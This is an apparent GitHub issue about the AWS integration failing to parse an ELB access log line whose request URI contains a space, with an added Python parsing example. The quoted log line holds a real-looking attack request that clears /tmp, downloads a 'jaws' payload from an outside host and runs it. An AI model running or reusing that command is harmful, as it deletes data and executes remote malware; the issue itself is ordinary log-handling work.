[aws] elb access logs fails to parse data #3491

@kaiyan-sheng

When using the AWS integration to collect ELB access logs, the user sees that this log entry cannot be parsed:

http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 75.100.154.140:41542 - -1 -1 -1 301 - 233 390 "GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1" "Hello, world" - - - "Root=1-627cac19-4c6df30820daa80e3fd72ced" "-" "-" 0 2022-05-12T06:41:29.051000Z "redirect" "https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws" "-" "-" "-" "Acceptable" "SpaceInUri"

This is caused by the space in the HTTP request: http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws.
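
One way to parse a request field whose URI contains a space, as an added Python example (not the integration's own pipeline code and not part of the original report): the quoted field is split from the outside in, so the method is the first token, the protocol is the last, and everything between them is the URI. The function names are hypothetical, the sample line is constructed and cut off after the user agent field, and the method and protocol tokens are assumed to contain no spaces.

```python
import re

# Field order up to the quoted user agent, as on the sample line in the issue.
LEADING = ["type", "time", "elb", "client", "target",
           "request_processing_time", "target_processing_time",
           "response_processing_time", "elb_status_code",
           "target_status_code", "received_bytes", "sent_bytes",
           "request", "user_agent"]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def split_fields(line):
    """Split on whitespace, keeping double-quoted fields whole."""
    return [quoted if bare == "" else bare for quoted, bare in TOKEN.findall(line)]

def strict_request(request):
    """Three-token view of the request: fails when the URI has a space."""
    parts = request.split(" ")
    if len(parts) != 3:
        raise ValueError("expected 3 tokens, got %d" % len(parts))
    return dict(zip(("method", "url", "protocol"), parts))

def tolerant_request(request):
    """Method is the first token, protocol the last, the URI is the rest."""
    method, _, rest = request.partition(" ")
    url, _, protocol = rest.rpartition(" ")
    return {"method": method, "url": url, "protocol": protocol}

def parse(line):
    """Map the leading fields by position and split the request tolerantly."""
    record = dict(zip(LEADING, split_fields(line)))
    record["request"] = tolerant_request(record["request"])
    return record

# Constructed sample: documentation addresses, benign query with a space.
SAMPLE = ('http 2022-05-12T06:41:29.051646Z app/example-lb/0123456789abcdef '
          '192.0.2.10:41542 - -1 -1 -1 301 - 233 390 '
          '"GET http://192.0.2.20:80/search?q=a b HTTP/1.1" "Hello, world"')

if __name__ == "__main__":
    print(parse(SAMPLE))
```

Keeping the raw URI intact, space included, preserves the evidence that the load balancer itself flagged with the `SpaceInUri` classification reason.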

Labels: Team:Cloud-Monitoring (Label for the Cloud Monitoring team), bug (Something isn't working, use only for issues)
